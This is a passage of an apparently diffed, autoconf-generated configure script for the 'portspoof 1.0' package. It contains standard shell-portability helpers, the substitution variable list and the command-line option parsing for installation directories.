x$as_have_required = xno; then : + $as_echo "$0: This script requires a shell more modern than all" + $as_echo "$0: the shells that I found on your system." + if test x${ZSH_VERSION+set} = xset ; then + $as_echo "$0: In particular, zsh $ZSH_VERSION has bugs and should" + $as_echo "$0: be upgraded to zsh 4.3.4 or later." + else + $as_echo "$0: Please tell bug-autoconf@gnu.org and +$0: piotr@<:@at@:>@duszynski.eu about your system, including any +$0: error possibly output before this message. Then install +$0: a modern shell, or manually run the script under such a +$0: shell if you do have one." + fi + exit 1 +fi +fi +fi +SHELL=${CONFIG_SHELL-/bin/sh} +export SHELL +# Unset more variables known to interfere with behavior of common tools. +CLICOLOR_FORCE= GREP_OPTIONS= +unset CLICOLOR_FORCE GREP_OPTIONS + +## --------------------- ## +## M4sh Shell Functions. ## +## --------------------- ## +@%:@ as_fn_unset VAR +@%:@ --------------- +@%:@ Portably unset VAR. +as_fn_unset () +{ + { eval $1=; unset $1;} +} +as_unset=as_fn_unset + +@%:@ as_fn_set_status STATUS +@%:@ ----------------------- +@%:@ Set @S|@? to STATUS, without forking. +as_fn_set_status () +{ + return $1 +} @%:@ as_fn_set_status + +@%:@ as_fn_exit STATUS +@%:@ ----------------- +@%:@ Exit the shell with STATUS, even in a "trap 0" or "set -e" context. +as_fn_exit () +{ + set +e + as_fn_set_status $1 + exit $1 +} @%:@ as_fn_exit + +@%:@ as_fn_mkdir_p +@%:@ ------------- +@%:@ Create "@S|@as_dir" as a directory, including parents if necessary. +as_fn_mkdir_p () +{ + + case $as_dir in #( + -*) as_dir=./$as_dir;; + esac + test -d "$as_dir" || eval $as_mkdir_p || { + as_dirs= + while :; do + case $as_dir in #( + *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( + *) as_qdir=$as_dir;; + esac + as_dirs="'$as_qdir' $as_dirs" + as_dir=`$as_dirname -- "$as_dir" || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + test -d "$as_dir" && break + done + test -z "$as_dirs" || eval "mkdir $as_dirs" + } || test -d "$as_dir" || as_fn_error "cannot create directory $as_dir" + + +} @%:@ as_fn_mkdir_p +@%:@ as_fn_append VAR VALUE +@%:@ ---------------------- +@%:@ Append the text in VALUE to the end of the definition contained in VAR. Take +@%:@ advantage of any shell optimizations that allow amortized linear growth over +@%:@ repeated appends, instead of the typical quadratic growth present in naive +@%:@ implementations. +if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : + eval 'as_fn_append () + { + eval $1+=\$2 + }' +else + as_fn_append () + { + eval $1=\$$1\$2 + } +fi # as_fn_append + +@%:@ as_fn_arith ARG... +@%:@ ------------------ +@%:@ Perform arithmetic evaluation on the ARGs, and store the result in the +@%:@ global @S|@as_val. Take advantage of shells that can avoid forks. The arguments +@%:@ must be portable across @S|@(()) and expr. +if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : + eval 'as_fn_arith () + { + as_val=$(( $* )) + }' +else + as_fn_arith () + { + as_val=`expr "$@" || test $? -eq 1` + } +fi # as_fn_arith + + +@%:@ as_fn_error ERROR [LINENO LOG_FD] +@%:@ --------------------------------- +@%:@ Output "`basename @S|@0`: error: ERROR" to stderr. If LINENO and LOG_FD are +@%:@ provided, also output the error to LOG_FD, referencing LINENO. Then exit the +@%:@ script with status @S|@?, using 1 if that was 0. +as_fn_error () +{ + as_status=$?; test $as_status -eq 0 && as_status=1 + if test "$3"; then + as_lineno=${as_lineno-"$2"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + $as_echo "$as_me:${as_lineno-$LINENO}: error: $1" >&$3 + fi + $as_echo "$as_me: error: $1" >&2 + as_fn_exit $as_status +} @%:@ as_fn_error + +if expr a : '\(a\)' >/dev/null 2>&1 && + test "X`expr 00001 : '.*\(...\)'`" = X001; then + as_expr=expr +else + as_expr=false +fi + +if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then + as_basename=basename +else + as_basename=false +fi + +if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then + as_dirname=dirname +else + as_dirname=false +fi + +as_me=`$as_basename -- "$0" || +$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X/"$0" | + sed '/^.*\/\([^/][^/]*\)\/*$/{ + s//\1/ + q + } + /^X\/\(\/\/\)$/{ + s//\1/ + q + } + /^X\/\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits + + + as_lineno_1=$LINENO as_lineno_1a=$LINENO + as_lineno_2=$LINENO as_lineno_2a=$LINENO + eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" && + test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || { + # Blame Lee E. McMahon (1931-1989) for sed's syntax. :-) + sed -n ' + p + /[$]LINENO/= + ' <$as_myself | + sed ' + s/[$]LINENO.*/&-/ + t lineno + b + :lineno + N + :loop + s/[$]LINENO\([^'$as_cr_alnum'_].*\n\)\(.*\)/\2\1\2/ + t loop + s/-\n.*// + ' >$as_me.lineno && + chmod +x "$as_me.lineno" || + { $as_echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2; as_fn_exit 1; } + + # Don't try to exec as it changes $[0], causing all sort of problems + # (the dirname of $[0] is not the place where we might find the + # original and so on. Autoconf is especially sensitive to this). + . "./$as_me.lineno" + # Exit status is that of the last command. + exit +} + +ECHO_C= ECHO_N= ECHO_T= +case `echo -n x` in @%:@((((( +-n*) + case `echo 'xy\c'` in + *c*) ECHO_T=' ';; # ECHO_T is single tab character. + xy) ECHO_C='\c';; + *) echo `echo ksh88 bug on AIX 6.1` > /dev/null + ECHO_T=' ';; + esac;; +*) + ECHO_N='-n';; +esac + +rm -f conf$$ conf$$.exe conf$$.file +if test -d conf$$.dir; then + rm -f conf$$.dir/conf$$.file +else + rm -f conf$$.dir + mkdir conf$$.dir 2>/dev/null +fi +if (echo >conf$$.file) 2>/dev/null; then + if ln -s conf$$.file conf$$ 2>/dev/null; then + as_ln_s='ln -s' + # ... but there are two gotchas: + # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. + # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. + # In both cases, we have to default to `cp -p'. + ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || + as_ln_s='cp -p' + elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln + else + as_ln_s='cp -p' + fi +else + as_ln_s='cp -p' +fi +rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file +rmdir conf$$.dir 2>/dev/null + +if mkdir -p . 2>/dev/null; then + as_mkdir_p='mkdir -p "$as_dir"' +else + test -d ./-p && rmdir ./-p + as_mkdir_p=false +fi + +if test -x / >/dev/null 2>&1; then + as_test_x='test -x' +else + if ls -dL / >/dev/null 2>&1; then + as_ls_L_option=L + else + as_ls_L_option= + fi + as_test_x=' + eval sh -c '\'' + if test -d "$1"; then + test -d "$1/."; + else + case $1 in @%:@( + -*)set "./$1";; + esac; + case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in @%:@(( + ???[sx]*):;;*)false;;esac;fi + '\'' sh + ' +fi +as_executable_p=$as_test_x + +# Sed expression to map a string onto a valid CPP name. +as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" + +# Sed expression to map a string onto a valid variable name. +as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" + + +test -n "$DJDIR" || exec 7<&0 &1 + +# Name of the host. +# hostname on some systems (SVR3.2, Linux) returns a bogus exit status, +# so uname gets run too. +ac_hostname=`(hostname || uname -n) 2>/dev/null | sed 1q` + +# +# Initializations. +# +ac_default_prefix=/usr/local +ac_clean_files= +ac_config_libobj_dir=. +LIB@&t@OBJS= +cross_compiling=no +subdirs= +MFLAGS= +MAKEFLAGS= + +# Identity of this package. +PACKAGE_NAME='portspoof' +PACKAGE_TARNAME='portspoof' +PACKAGE_VERSION='1.0' +PACKAGE_STRING='portspoof 1.0' +PACKAGE_BUGREPORT='piotratduszynski.eu' +PACKAGE_URL='' + +ac_unique_file="src/Portspoof.cpp" +# Factoring default headers for most tests. +ac_includes_default="\ +#include +#ifdef HAVE_SYS_TYPES_H +# include +#endif +#ifdef HAVE_SYS_STAT_H +# include +#endif +#ifdef STDC_HEADERS +# include +# include +#else +# ifdef HAVE_STDLIB_H +# include +# endif +#endif +#ifdef HAVE_STRING_H +# if !defined STDC_HEADERS && defined HAVE_MEMORY_H +# include +# endif +# include +#endif +#ifdef HAVE_STRINGS_H +# include +#endif +#ifdef HAVE_INTTYPES_H +# include +#endif +#ifdef HAVE_STDINT_H +# include +#endif +#ifdef HAVE_UNISTD_H +# include +#endif" + +ac_subst_vars='am__EXEEXT_FALSE +am__EXEEXT_TRUE +LTLIBOBJS +LIB@&t@OBJS +EGREP +GREP +CPP +am__fastdepCC_FALSE +am__fastdepCC_TRUE +CCDEPMODE +ac_ct_CC +CFLAGS +CC +am__fastdepCXX_FALSE +am__fastdepCXX_TRUE +CXXDEPMODE +AMDEPBACKSLASH +AMDEP_FALSE +AMDEP_TRUE +am__quote +am__include +DEPDIR +OBJEXT +EXEEXT +ac_ct_CXX +CPPFLAGS +LDFLAGS +CXXFLAGS +CXX +host_os +host_vendor +host_cpu +host +build_os +build_vendor +build_cpu +build +am__untar +am__tar +AMTAR +am__leading_dot +SET_MAKE +AWK +mkdir_p +MKDIR_P +INSTALL_STRIP_PROGRAM +STRIP +install_sh +MAKEINFO +AUTOHEADER +AUTOMAKE +AUTOCONF +ACLOCAL +VERSION +PACKAGE +CYGPATH_W +am__isrc +INSTALL_DATA +INSTALL_SCRIPT +INSTALL_PROGRAM +target_alias +host_alias +build_alias +LIBS +ECHO_T +ECHO_N +ECHO_C +DEFS +mandir +localedir +libdir +psdir +pdfdir +dvidir +htmldir +infodir +docdir +oldincludedir +includedir +localstatedir +sharedstatedir +sysconfdir +datadir +datarootdir +libexecdir +sbindir +bindir +program_transform_name +prefix +exec_prefix +PACKAGE_URL +PACKAGE_BUGREPORT +PACKAGE_STRING +PACKAGE_VERSION +PACKAGE_TARNAME +PACKAGE_NAME +PATH_SEPARATOR +SHELL' +ac_subst_files='' +ac_user_opts=' +enable_option_checking +enable_dependency_tracking +' + ac_precious_vars='build_alias +host_alias +target_alias +CXX +CXXFLAGS +LDFLAGS +LIBS +CPPFLAGS +CCC +CC +CFLAGS +CPP' + + +# Initialize some variables set by options. +ac_init_help= +ac_init_version=false +ac_unrecognized_opts= +ac_unrecognized_sep= +# The variables have the same names as the options, with +# dashes changed to underlines. +cache_file=/dev/null +exec_prefix=NONE +no_create= +no_recursion= +prefix=NONE +program_prefix=NONE +program_suffix=NONE +program_transform_name=s,x,x, +silent= +site= +srcdir= +verbose= +x_includes=NONE +x_libraries=NONE + +# Installation directory options. +# These are left unexpanded so users can "make install exec_prefix=/foo" +# and all the variables that are supposed to be based on exec_prefix +# by default will actually change. +# Use braces instead of parens because sh, perl, etc. also accept them. +# (The list follows the same order as the GNU Coding Standards.) +bindir='${exec_prefix}/bin' +sbindir='${exec_prefix}/sbin' +libexecdir='${exec_prefix}/libexec' +datarootdir='${prefix}/share' +datadir='${datarootdir}' +sysconfdir='${prefix}/etc' +sharedstatedir='${prefix}/com' +localstatedir='${prefix}/var' +includedir='${prefix}/include' +oldincludedir='/usr/include' +docdir='${datarootdir}/doc/${PACKAGE_TARNAME}' +infodir='${datarootdir}/info' +htmldir='${docdir}' +dvidir='${docdir}' +pdfdir='${docdir}' +psdir='${docdir}' +libdir='${exec_prefix}/lib' +localedir='${datarootdir}/locale' +mandir='${datarootdir}/man' + +ac_prev= +ac_dashdash= +for ac_option +do + # If the previous option needs an argument, assign it. + if test -n "$ac_prev"; then + eval $ac_prev=\$ac_option + ac_prev= + continue + fi + + case $ac_option in + *=*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;; + *) ac_optarg=yes ;; + esac + + # Accept the important Cygnus configure options, so we can diagnose typos. + + case $ac_dashdash$ac_option in + --) + ac_dashdash=yes ;; + + -bindir | --bindir | --bindi | --bind | --bin | --bi) + ac_prev=bindir ;; + -bindir=* | --bindir=* | --bindi=* | --bind=* | --bin=* | --bi=*) + bindir=$ac_optarg ;; + + -build | --build | --buil | --bui | --bu) + ac_prev=build_alias ;; + -build=* | --build=* | --buil=* | --bui=* | --bu=*) + build_alias=$ac_optarg ;; + + -cache-file | --cache-file | --cache-fil | --cache-fi \ + | --cache-f | --cache- | --cache | --cach | --cac | --ca | --c) + ac_prev=cache_file ;; + -cache-file=* | --cache-file=* | --cache-fil=* | --cache-fi=* \ + | --cache-f=* | --cache-=* | --cache=* | --cach=* | --cac=* | --ca=* | --c=*) + cache_file=$ac_optarg ;; + + --config-cache | -C) + cache_file=config.cache ;; + + -datadir | --datadir | --datadi | --datad) + ac_prev=datadir ;; + -datadir=* | --datadir=* | --datadi=* | --datad=*) + datadir=$ac_optarg ;; + + -datarootdir | --datarootdir | --datarootdi | --datarootd | --dataroot \ + | --dataroo | --dataro | --datar) + ac_prev=datarootdir ;; + -datarootdir=* | --datarootdir=* | --datarootdi=* | --datarootd=* \ + | --dataroot=* | --dataroo=* | --dataro=* | --datar=*) + datarootdir=$ac_optarg ;; + + -disable-* | --disable-*) + ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid feature name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"enable_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--disable-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval enable_$ac_useropt=no ;; + + -docdir | --docdir | --docdi | --doc | --do) + ac_prev=docdir ;; + -docdir=* | --docdir=* | --docdi=* | --doc=* | --do=*) + docdir=$ac_optarg ;; + + -dvidir | --dvidir | --dvidi | --dvid | --dvi | --dv) + ac_prev=dvidir ;; + -dvidir=* | --dvidir=* | --dvidi=* | --dvid=* | --dvi=* | --dv=*) + dvidir=$ac_optarg ;; + + -enable-* | --enable-*) + ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid feature name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"enable_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--enable-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval enable_$ac_useropt=\$ac_optarg ;; + + -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ + | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ + | --exec | --exe | --ex) + ac_prev=exec_prefix ;; + -exec-prefix=* | --exec_prefix=* | --exec-prefix=* | --exec-prefi=* \ + | --exec-pref=* | --exec-pre=* | --exec-pr=* | --exec-p=* | --exec-=* \ + | --exec=* | --exe=* | --ex=*) + exec_prefix=$ac_optarg ;; + + -gas | --gas | --ga | --g) + # Obsolete; use --with-gas. + with_gas=yes ;; + + -help | --help | --hel | --he | -h) + ac_init_help=long ;; + -help=r* | --help=r* | --hel=r* | --he=r* | -hr*) + ac_init_help=recursive ;; + -help=s* | --help=s* | --hel=s* | --he=s* | -hs*) + ac_init_help=short ;; + + -host | --host | --hos | --ho) + ac_prev=host_alias ;; + -host=* | --host=* | --hos=* | --ho=*) + host_alias=$ac_optarg ;; + + -htmldir | --htmldir | --htmldi | --htmld | --html | --htm | --ht) + ac_prev=htmldir ;; + -htmldir=* | --htmldir=* | --htmldi=* | --htmld=* | --html=* | --htm=* \ + | --ht=*) + htmldir=$ac_optarg ;; + + -includedir | --includedir | --includedi | --included | --include \ + | --includ | --inclu | --incl | --inc) + ac_prev=includedir ;; + -includedir=* | --includedir=* | --includedi=* | --included=* | --include=* \ + | --includ=* | --inclu=* | --incl=* | --inc=*) + includedir=$ac_optarg ;; + + -infodir | --infodir | --infodi | --infod | --info | --inf) + ac_prev=infodir ;; + -infodir=* | --infodir=* | --infodi=* | --infod=* | --info=* | --inf=*) + infodir=$ac_optarg ;; + + -libdir | --libdir | --libdi | --libd) + ac_prev=libdir ;; + -libdir=* | --libdir=* | --libdi=* | --libd=*) + libdir=$ac_optarg ;; + + -libexecdir | --libexecdir | --libexecdi | --libexecd | --libexec \ + | --libexe | --libex | --libe) + ac_prev=libexecdir ;; + -libexecdir=* | --libexecdir=* | --libexecdi=* | --libexecd=* | --libexec=* \ + | --libexe=* | --libex=* | --libe=*) + libexecdir=$ac_optarg ;; + + -localedir | --localedir | --localedi | --localed | --locale) + ac_prev=localedir ;; + -localedir=* | --localedir=* | --localedi=* | --localed=* | --locale=*) + localedir=$ac_optarg ;; + + -localstatedir | --localstatedir | --localstatedi | --localstated \ + | --localstate | --localstat | --localsta | --localst | --locals) + ac_prev=localstatedir ;; + -localstatedir=* | --localstatedir=* | --localstatedi=* | --localstated=* \ + | --localstate=* | --localstat=* | --localsta=* | --localst=* | --locals=*) + localstatedir=$ac_optarg ;; + + -mandir | --mandir | --mandi | --mand | --man | --ma | --m) + ac_prev=mandir ;; + -mandir=* | --mandir=* | --mandi=* | --mand=* | --man=* | --ma=* | --m=*) + mandir=$ac_optarg ;; + + -nfp | --nfp | --nf) + # Obsolete; use --without-fp. + with_fp=no ;; + + -no-create | --no-create | --no-creat | --no-crea | --no-cre \ + | --no-cr | --no-c | -n) + no_create=yes ;; + + -no-recursion | --no-recursion | --no-recursio | --no-recursi \ + | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) + no_recursion=yes ;; + + -oldincludedir | --oldincludedir | --oldincludedi | --oldincluded \ + | --oldinclude | --oldinclud | --oldinclu | --oldincl | --oldinc \ + | --oldin | --oldi | --old | --ol | --o) + ac_prev=oldincludedir ;; + -oldincludedir=* | --oldincludedir=* | --oldincludedi=* | --oldincluded=* \ + | --oldinclude=* | --oldinclud=* | --oldinclu=* | --oldincl=* | --oldinc=* \ + | --oldin=* | --oldi=* | --old=* | --ol=* | --o=*) + oldincludedir=$ac_optarg ;; + + -prefix | --prefix | --prefi | --pref | --pre | --pr | --p) + ac_prev=prefix ;; + -prefix=* | --prefix=* | --prefi=* | --pref=* | --pre=* | --pr=* | --p=*) + prefix=$ac_optarg ;; + + -program-prefix | --program-prefix | --program-prefi | --program-pref \ + | --program-pre | --program-pr | --program-p) + ac_prev=program_prefix ;; + -program-prefix=* | --program-prefix=* | --program-prefi=* \ + | --program-pref=* | --program-pre=* | --program-pr=* | --program-p=*) + program_prefix=$ac_optarg ;; + + -program-suffix | --program-suffix | --program-suffi | --program-suff \ + | --program-suf | --program-su | --program-s) + ac_prev=program_suffix ;; + -program-suffix=* | --program-suffix=* | --program-suffi=* \ + | --program-suff=* | --program-suf=* | --program-su=* | --program-s=*) + program_suffix=$ac_optarg ;; + + -program-transform-name | --program-transform-name \ + | --program-transform-nam | --program-transform-na \ + | --program-transform-n | --program-transform- \ + | --program-transform | --program-transfor \ + | --program-transfo | --program-transf \ + | --program-trans | --program-tran \ + | --progr-tra | --program-tr | --program-t) + ac_prev=program_transform_name ;; + -program-transform-name=* | --program-transform-name=* \ + | --program-transform-nam=* | --program-transform-na=* \ + | --program-transform-n=* | --program-transform-=* \ + | --program-transform=* | --program-transfor=* \ + | --program-transfo=* | --program-transf=* \ + | --program-trans=* | --program-tran=* \ + | --progr-tra=* | --program-tr=* | --program-t=*) + program_transform_name=$ac_optarg ;; + + -pdfdir | --pdfdir | --pdfdi | --pdfd | --pdf | --pd) + ac_prev=pdfdir ;; + -pdfdir=* | --pdfdir=* | --pdfdi=* | --pdfd=* | --pdf=* | --pd=*) + pdfdir=$ac_optarg ;; + + -psdir | --psdir | --psdi | --psd | --ps) + ac_prev=psdir ;; + -psdir=* | --psdir=* | --psdi=* | --psd=* | --ps=*) + psdir=$ac_optarg ;; + + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil) + silent=yes ;; + + -sbindir | --sbindir | --sbindi | --sbind | --sbin | --sbi | --sb) + ac_prev=sbindir ;; + -sbindir=* | --sbindir=* | --sbindi=* | --sbind=* | --sbin=* \ + | --sbi=* | --sb=*) + sbindir=$ac_optarg ;; + + -sharedstatedir | --sharedstatedir | --sharedstatedi \ + | --sharedstated | --sharedstate | --sharedstat | --sharedsta \ + | --sharedst | --shareds | --shared | --share | --shar \ + | --sha | --sh) + ac_prev=sharedstatedir ;; + -sharedstatedir=* | --sharedstatedir=* | --sharedstatedi=* \ + | --sharedstated=* | --sharedstate=* | --sharedstat=* | --sharedsta=* \ + | --sharedst=* | --shareds=* | --shared=* | --share=* | --shar=* \ + | --sha=* | --sh=*) + sharedstatedir=$ac_optarg ;; + + -site | --site | --sit) + ac_prev=site ;; + -site=* | --site=* | --sit=*) + site=$ac_optarg ;; + + -srcdir | --srcdir | --srcdi | --srcd | --src | --sr) + ac_prev=srcdir ;; + -srcdir=* | --srcdir=* | --srcdi=* | --srcd=* | --src=* | --sr=*) + srcdir=$ac_optarg ;; + + -sysconfdir | --sysconfdir | --sysconfdi | --sysconfd | --sysconf \ + | --syscon | --sysco | --sysc | --sys | --sy) + ac_prev=sysconfdir ;; + -sysconfdir=* | --sysconfdir=* | --sysconfdi=* | --sysconfd=* | --sysconf=* \ + | --syscon=* | --sysco=* | --sysc=* | --sys=* | --sy=*) + sysconfdir=$ac_optarg ;; + + -target | --target | --targe | --targ | --tar | --ta | --t) + ac_prev=target_alias ;; + -target=* | --target=* | --targe=* | --targ=* | --tar=* | --ta=* | --t=*) + target_alias=$ac_optarg ;; + + -v | -verbose | --verbose | --verbos | --verbo | --verb) + verbose=yes ;; + + -version | --version | --versio | --versi | --vers | -V) + ac_init_version=: ;; + + -with-* | --with-*) + ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid package name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"with_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--with-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval with_$ac_useropt=\$ac_optarg ;; + + -without-* | --without-*) + ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid package name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"with_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--without-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval with_$ac_useropt=no ;; + + --x) + # Obsolete; use --with-x. + with_x=yes ;; + + -x-includes | --x-includes | --x-include | --x-includ | --x-inclu \ + | --x-incl | --x-inc | --x-in | --x-i) + ac_prev=x_includes ;; + -x-includes=* | --x-includes=* | --x-include=* | --x-includ=* | --x-inclu=* \ + | --x-incl=* | --x-inc=* | --x-in=* | --x-i=*) + x_includes=$ac_optarg ;; + + -x-libraries | --x-libraries | --x-librarie | --x-librari \ + | --x-librar | --x-libra | --x-libr | --x-lib | --x-li | --x-l) + ac_prev=x_libraries ;; + -x-libraries=* | --x-libraries=* | --x-librarie=* | --x-librari=* \ + | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) + x_libraries=$ac_optarg ;; + + -*) as_fn_error "unrecognized option: \`$ac_option' +Try \`$0 --help' for more information." + ;; + + *=*) + ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='` + # Reject names that are not valid shell variable names. + case $ac_envvar in #( + '' | [0-9]* | *[!_$as_cr_alnum]* ) + as_fn_error "invalid variable name: \`$ac_envvar'" ;; + esac + eval $ac_envvar=\$ac_optarg + export $ac_envvar ;; + + *) + # FIXME: should be removed in autoconf 3.0. + $as_echo "$as_me: WARNING: you should use --build, --host, --target" >&2 + expr "x$ac_option" : ".*[^-._$as_cr_alnum]" >/dev/null && + $as_echo "$as_me: WARNING: invalid host type: $ac_option" >&2 + : ${build_alias=$ac_option} ${host_alias=$ac_option} ${target_alias=$ac_option} + ;; + + esac +done + +if test -n "$ac_prev"; then + ac_option=--`echo $ac_prev | sed 's/_/-/g'` + as_fn_error "missing argument to $ac_option" +fi + +if test -n "$ac_unrecognized_opts"; then + case $enable_option_checking in + no) ;; + fatal) as_fn_error "unrecognized options: $ac_unrecognized_opts" ;; + *) $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2 ;; + esac +fi + +# Check all directory arguments for consistency. +for ac_var in exec_prefix prefix bindir sbindir libexecdir datarootdir \ + datadir sysconfdir sharedstatedir localstatedir includedir \ + oldincludedir docdir infodir htmldir dvidir pdfdir psdir \ + libdir localedir mandir +do + eval ac_val=\$$ac_var + # Remove trailing slashes. + case $ac_val in + */ ) + ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'` + eval $ac_var=\$ac_val;; + esac + # Be sure to have absolute directory names. + case $ac_val in + [\\/$]* | ?:[\\/]* ) continue;; + NONE | '' ) case $ac_var in *prefix ) continue;; esac;; + esac + as_fn_error "expected an absolute directory name for --$ac_var: $ac_val" +done + +# There might be people who depend on the old broken behavior: `$host' +# used to hold the argument of --host etc. +# FIXME: To remove some day. +build=$build_alias +host=$host_alias +target=$target_alias + +# FIXME: To remove some day. +if test "x$host_alias" != x; then + if test "x$build_alias" = x; then + cross_compiling=maybe + $as_echo "$as_me: WARNING: If you wanted to set the --build type, don't use --host. + If a cross compiler is detected then cross compile mode will be used." >&2 + elif test "x$build_alias" != "x$host_alias"; then + cross_compiling=yes + fi +fi + +ac_tool_prefix= +test -n "$host_alias" && ac_tool_prefix=$host_alias- + +test "$silent" = yes && exec 6>/dev/null + + +ac_pwd=`pwd` && test -n "$ac_pwd" && +ac_ls_di=`ls -di .` && +ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` || + as_fn_error "working directory cannot be determined" +test "X$ac_ls_di" = "X$ac_pwd_ls_di" || + as_fn_error "pwd does not report name of working directory" + + +# Find the source files, if location was not specified. +if test -z "$srcdir"; then + ac_srcdir_defaulted=yes + # Try the directory containing this script, then the parent directory. + ac_confdir=`$as_dirname -- "$as_myself" || +$as_expr X"$as_myself" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_myself" : 'X\(//\)[^/]' \| \ + X"$as_myself" : 'X\(//\)$' \| \ + X"$as_myself" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_myself" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + srcdir=$ac_confdir + if test ! -r "$srcdir/$ac_unique_file"; then + srcdir=.. + fi +else + ac_srcdir_defaulted=no +fi +if test ! -r "$srcdir/$ac_unique_file"; then + test "$ac_srcdir_defaulted" = yes && srcdir="$ac_confdir or .." + as_fn_error "cannot find sources ($ac_unique_file) in $srcdir" +fi +ac_msg="sources are in $srcdir, but \`cd $srcdir' does not work" +ac_abs_confdir=`( + cd "$srcdir" && test -r "./$ac_unique_file" || as_fn_error "$ac_msg" + pwd)` +# When building in place, set srcdir=. +if test "$ac_abs_confdir" = "$ac_pwd"; then + srcdir=. +fi +# Remove unnecessary trailing slashes from srcdir. +# Double slashes in file names in object file debugging info +# mess up M-x gdb in Emacs. +case $srcdir in +*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;; +esac +for ac_var in $ac_precious_vars; do + eval ac_env_${ac_var}_set=\${${ac_var}+set} + eval ac_env_${ac_var}_value=\$${ac_var} + eval ac_cv_env_${ac_var}_set=\${${ac_var}+set} + eval 